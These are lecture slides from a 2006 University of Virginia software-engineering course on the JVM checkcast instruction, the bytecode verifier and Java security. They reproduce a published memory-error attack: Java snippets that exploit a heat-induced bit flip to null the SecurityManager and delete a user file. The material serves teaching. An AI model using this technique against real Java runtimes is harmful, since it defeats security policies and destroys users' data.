Reasoning about Data Abstractions - PowerPoint PPT Presentation

1
CS205: Engineering Software, University of Virginia, Fall 2006
Hair-Dryer Attacks
Image from www.clean-funny.com, GoldenBlue LLC.
2
Project Design Documents
  • A description of your project: what it will do and why it is useful, fun, or interesting.
  • A high-level description of your design, including a module dependency diagram showing the most important modules.
  • A description of your implementation and testing strategy, including:
      • how you will divide the work amongst your team
      • how you will order the work to support incremental development
      • how you will do unit testing and integration testing
      • a list of milestones and a schedule for achieving them, leading to a completed project on December 4
  • A list of questions

3
Friday's Class
  • Project Design Documents due at beginning of class
  • Class will be at the Undergraduate Research Symposium, Harrison Special Collections Library
  • 1:00pm: Adrienne Felt, Disk-Level Malware Detection
  • other talks: Candomblé and Healthcare in Bahia; An Investigation of the Medical Atmosphere in South Africa: the Role of Community Home-Based Caregivers

4
Quiz
  • Everyone got 0xCAFEBABE
  • 3 people sort of got question 6 (full credit if your answer convinced me you'd looked at the ps5 comments)
  • I'll ask a question on the final (open notes) about this same question, so make sure you understand it before then.

5
Teammate Assessment
  • Your answers:
      • Mostly fair share of work, quality of work
      • Did anybody make a huge breakthrough with some great idea that made everything else go smoother/faster?
  • Being a good teammate is more...
      • Responsibility: takes responsibility for parts of the project and follows through
      • Reliability: comes to meetings on time
      • Cooperative: listens to teammates, willing to discuss things respectfully and come to a shared decision


6
Future Topics
  • write-ins
  • GUI programming and design (4 people)
  • network programming (2 people)
  • I think I have seen enough. :)
  • Famous Software Disasters (everyone ranked, 1 2 2
    2 5 6 7 7 9)
  • Web Programming (1 1 1 1 2 2 4 6)
  • C (1 1 1 3 4), Different Programming Languages
    (4 5 6 7)
  • Performance (3 3 3 3 4 6 10)

7
checkcast
  • No one had a good answer to the checkcast
    question
  • Explain what the checkcast instruction does? vs
    Write a specification for the checkcast
    instruction

8
Pseudo-method Specification
    instruction checkcast (Stack s, Type t)
        throws CheckCastException
      REQUIRES: s must contain at least one element, and the top of s must be an object reference
      MODIFIES: nothing
      EFFECTS: If the object on the top of the stack could be used where a type t is expected, no effects. Otherwise, throws CheckCastException.

9
checkcast
Operation: Check whether object is of given type
Format:
    checkcast
    indexbyte1
    indexbyte2
Forms: checkcast = 192 (0xc0)
Operand Stack: ..., objectref → ..., objectref
Description: The objectref must be of type reference. The unsigned indexbyte1 and indexbyte2 are used to construct an index into the runtime constant pool of the current class (§3.6), where the value of the index is (indexbyte1 << 8) | indexbyte2. The runtime constant pool item at the index must be a symbolic reference to a class, array, or interface type. The named class, array, or interface type is resolved (§5.4.3.1).
Java VM Specification: http://java.sun.com/docs/books/vmspec/2nd-edition/html/Instructions2.doc2.html
10
  • If objectref is null or can be cast to the resolved class, array, or interface type, the operand stack is unchanged; otherwise, the checkcast instruction throws a ClassCastException.
  • The following rules are used to determine whether an objectref that is not null can be cast to the resolved type: if S is the class of the object referred to by objectref and T is the resolved class, array, or interface type, checkcast determines whether objectref can be cast to type T as follows:
      • If S is an ordinary (nonarray) class, then:
          • If T is a class type, then S must be the same class (§2.8.1) as T, or a subclass of T.
          • If T is an interface type, then S must implement (§2.13) interface T.
      • If S is an interface type, then:
          • If T is a class type, then T must be Object (§2.4.7).
          • If T is an interface type, then T must be the same interface as S or a superinterface of S (§2.13.2).
      • If S is a class representing the array type SC[], that is, an array of components of type SC, then ...

11
      • If S is a class representing the array type SC[], that is, an array of components of type SC, then:
          • If T is a class type, then T must be Object (§2.4.7).
          • If T is an array type TC[], that is, an array of components of type TC, then one of the following must be true:
              • TC and SC are the same primitive type (§2.4.1).
              • TC and SC are reference types (§2.4.6), and type SC can be cast to TC by recursive application of these rules.
          • If T is an interface type, T must be one of the interfaces implemented by arrays (§2.15).
  • Linking Exceptions
      • During resolution of the symbolic reference to the class, array, or interface type, any of the exceptions documented in Section 5.4.3.1 can be thrown.
  • Runtime Exception
      • Otherwise, if objectref cannot be cast to the resolved class, array, or interface type, the checkcast instruction throws a ClassCastException.
  • Notes
      • The checkcast instruction is very similar to the instanceof instruction. It differs in its treatment of null, its behavior when its test fails (checkcast throws an exception, instanceof pushes a result code), and its effect on the operand stack.
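The cast rules quoted above, written out as a small Python model so the case analysis on S and T can be exercised (an added example, not code from the slides or from the JVM specification; the class and interface names used in it are constructed sample types, and a JVM object is stood in for by its class):

```python
from dataclasses import dataclass
from typing import Optional, Tuple, Union

# Constructed model of the JVM type hierarchy (added example, not the slides' code).
@dataclass(frozen=True)
class ClassType:
    name: str
    superclass: Optional["ClassType"] = None
    interfaces: Tuple["InterfaceType", ...] = ()
@dataclass(frozen=True)
class InterfaceType:
    name: str
    superinterfaces: Tuple["InterfaceType", ...] = ()
@dataclass(frozen=True)
class ArrayType:
    component: Union[str, ClassType, InterfaceType, "ArrayType"]  # a str names a primitive
OBJECT = ClassType("java.lang.Object")
ARRAY_INTERFACES = (InterfaceType("java.lang.Cloneable"), InterfaceType("java.io.Serializable"))
class ClassCastException(Exception): pass
def is_subclass(s, t):  # S is the same class as T, or a subclass of T
    return s is not None and (s == t or is_subclass(s.superclass, t))
def is_subinterface(s, t):  # T is the same interface as S, or a superinterface of S
    return s == t or any(is_subinterface(i, t) for i in s.superinterfaces)
def implements(s, t):  # class S implements interface T, directly or via a superclass
    return s is not None and (any(is_subinterface(i, t) for i in s.interfaces)
                              or implements(s.superclass, t))

def can_cast(s, t):
    """The spec's case analysis: S is the object's class, T the resolved type."""
    if isinstance(s, ClassType):          # S is an ordinary (non-array) class
        if isinstance(t, ClassType): return is_subclass(s, t)
        return isinstance(t, InterfaceType) and implements(s, t)
    if isinstance(s, InterfaceType):      # S is an interface type
        if isinstance(t, ClassType): return t == OBJECT
        return isinstance(t, InterfaceType) and is_subinterface(s, t)
    if isinstance(t, ClassType):          # S is an array type SC[]
        return t == OBJECT
    if isinstance(t, InterfaceType):
        return t in ARRAY_INTERFACES      # interfaces implemented by arrays
    sc, tc = s.component, t.component     # T is an array type TC[]
    if isinstance(sc, str) or isinstance(tc, str):
        return sc == tc                   # must be the same primitive type
    return can_cast(sc, tc)               # reference components: apply the rules recursively
def checkcast(objectref, t):
    """objectref is the referenced object's class, or None for null; null passes unchanged."""
    if objectref is None or can_cast(objectref, t):
        return objectref
    raise ClassCastException(f"cannot cast {objectref} to {t}")
def instanceof(objectref, t):  # same test, but null yields false and nothing is thrown
    return objectref is not None and can_cast(objectref, t)
```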

12
Quiz 3
  • Which of these components are part of the trusted computing base when a user runs a Java applet in a web page? Components: applet source code, applet class file, Java compiler, Java bytecode verifier, Java VM.

13
Java Security
[Diagram: malcode.java → javac Compiler → malcode.class (JVML) → Java Bytecode Verifier; Invalid → STOP, Okay → JavaVM. A region of the diagram is labelled Trusted Computing Base.]
14
Simulating All Paths
  • The bytecode verifier verifies type safety for
    all possible executions of the program
  • Since there are infinitely many paths through the
    program, how is this possible?

15
Verifier (should be) Conservative
[Venn diagram with regions labelled: JVML programs, Safe programs, Verifiable programs]
(Slide from Nate Paul's ACSAC talk)
16
Complexity Increases Risk
[Venn diagram with regions labelled: JVML programs, Safe programs, Verifiable programs, Bug]
(Slide from Nate Paul's ACSAC talk)
17
Vulnerabilities in JavaVM
[Chart: Vulnerabilities Reported (0 to 45) against Years Since First Release (0 to 9), July 1996 to July 2005]
18
Where are They?
  • Verification: 12
  • API bugs: 10
  • Class loading: 8
  • Other or unknown: 2
  • Missing policy checks: 3
  • Configuration: 4
  • DoS attacks (crash, consumption): 5
(several of these were because of jsr complexity)
19
Summary: Low-level vs. Policy Security
  • Low-level Code Safety
      • Type safety, memory safety, control flow safety
      • Needed to prevent malcode from circumventing any policy mechanism
  • Policy Security
      • Control access and use of resources (files, network, display, etc.)
      • Enforced by Java class
      • Hard part is deciding on a good policy

20
Bytecode Verifier
  • Checks JVML code satisfies safety properties
  • Simulates program execution to know types are correct, but doesn't need to examine any instruction more than once
  • After code is verified, it is trusted: it is not checked for type safety at run time (except for casts, array stores)

Key assumption: when a value is written to a memory location, the value in that memory location is the same value when it is read.
21
Violating the Assumption
    // The object on top of the stack is a SimObject
    astore_0
    // There is a SimObject in location 0
    aload_0
    // The value on top of the stack is a SimObject
If a cosmic ray hits the right bit of memory between the store and load, the assumption might be wrong.
22
Improving the Odds
  • Set up memory so that a single bit error is
    likely to be exploitable
  • Mistreat the hardware memory to increase the odds
    that bits will flip

Following slides adapted (with permission) from
Sudhakar Govindavajhala and Andrew W. Appel,
Using Memory Errors to Attack a Virtual Machine,
July 2003.
23
Making Bit Flips Useful
Fill up memory with Filler objects, and one Pointee object
    class Filler {          class Pointee {
        Pointee a1;             Pointee a1;
        Pointee a2;             Pointee a2;
        Pointee a3;             Filler f;
        Pointee a4;             int b;
        Pointee a5;             Pointee a5;
        Pointee a6;             Pointee a6;
        Pointee a7;             Pointee a7;
    }                       }
24
Filling Up Memory
[Diagram: memory filled with Filler objects (fields a1..a7) around one Pointee object (fields a1, a2, f, b, a5, a6, a7); every Filler field points to the Pointee]
    Pointee p = new Pointee();
    Vector fillers = new Vector();
    try {
        while (true) {
            Filler f = new Filler();
            f.a1 = p; f.a2 = p; f.a3 = p; ... f.a7 = p;
            fillers.add(f);
        }
    } catch (OutOfMemoryException e) { }
25
Wait for a bit flip
[Diagram: the same memory layout of Filler objects around the one Pointee object]
  • Remember there are lots of Filler objects (fill up all of memory)
  • If a bit flips, good chance (70%) it will be in a field of a Filler object and it will now point to a Filler object instead of a Pointee object
26
Type Violation
[Diagram: the same memory layout; after the flip, f.a2 points to a Filler object instead of the Pointee]
  • After the bit flip, the value of f.a2 is a Filler object, but f.a2 was declared as a Pointee object!
Can an attacker exploit this?
27
Finding the Bit Flip
    Pointee p = new Pointee();
    Vector fillers = new Vector();
    try {
        while (true) {
            Filler f = new Filler();
            f.a1 = p; f.a2 = p; f.a3 = p; ... f.a7 = p;
            fillers.add(f);
        }
    } catch (OutOfMemoryException e) { }

    while (true) {
        for (Enumeration e = fillers.elements(); e.hasMoreElements(); ) {
            Filler f = (Filler) e.nextElement();
            if (f.a1 != p) { // bit flipped!
                ...
            } else if (f.a2 != p) {
                ...
            }
        }
    }

28
Violating Type Safety
    class Filler {          class Pointee {
        Pointee a1;             Pointee a1;
        Pointee a2;             Pointee a2;
        Pointee a3;             Filler f;
        Pointee a4;             int b;
        Pointee a5;             Pointee a5;
        Pointee a6;             Pointee a6;
        Pointee a7;             Pointee a7;
    }                       }

    Filler f = (Filler) e.nextElement();
    if (f.a1 != p) { // bit flipped!
        Object r = f.a1;
        Filler fr = (Filler) r; // Cast is checked at run-time

                                Declared Type
    f.a1                        Pointee
    f.a1.b                      int
    fr   (= f.a1)               Filler
    fr.a4 (same storage as f.a1.b)   Pointee
29
Violating Type Safety
    class Filler {          class Pointee {
        Pointee a1;             Pointee a1;
        Pointee a2;             Pointee a2;
        Pointee a3;             Filler f;
        Pointee a4;             int b;
        Pointee a5;             Pointee a5;
        Pointee a6;             Pointee a6;
        Pointee a7;             Pointee a7;
    }                       }

    Filler f = (Filler) e.nextElement();
    if (f.a1 != p) { // bit flipped!
        Object r = f.a1;
        Filler fr = (Filler) r; // Cast is checked at run-time
        f.a1.b = 1524383;       // Address of the SecurityManager
        fr.a4.a1 = null;        // Set it to a null
        // Do whatever you want! No security policy now
        new File("C:\\thesis.doc").delete();
30
Getting a Bit Flip
  • Wait for a Cosmic Ray
      • You have to be really, really patient (or move the machine out of Earth's atmosphere)
  • X-Rays
      • Expensive, not enough power to generate a bit-flip
  • High energy protons and neutrons
      • Work great - but you need a particle accelerator
  • Hmm.

31
Using Heat
  • 50-watt spotlight bulb
  • Between 80-100°C, memory starts to have a few failures
  • Attack applet is successful (at least half the time)!
  • Hairdryer works too, but it fries too many bits at once

Picture from Sudhakar Govindavajhala
32
Should Anyone be Worried?
Java virtual machine
33
Recap
  • Verifier assumes the value you write is the same value when you read it
  • By flipping bits, we can violate this assumption
  • By violating this assumption, we can violate type safety: get two references to the same storage that have inconsistent types
  • By violating type safety, we can get around all other security measures
  • For details, see the paper linked from the notes

34
Charge
  • Project design documents due Friday
  • Class will be at URN in Harrison Special
    Collections Library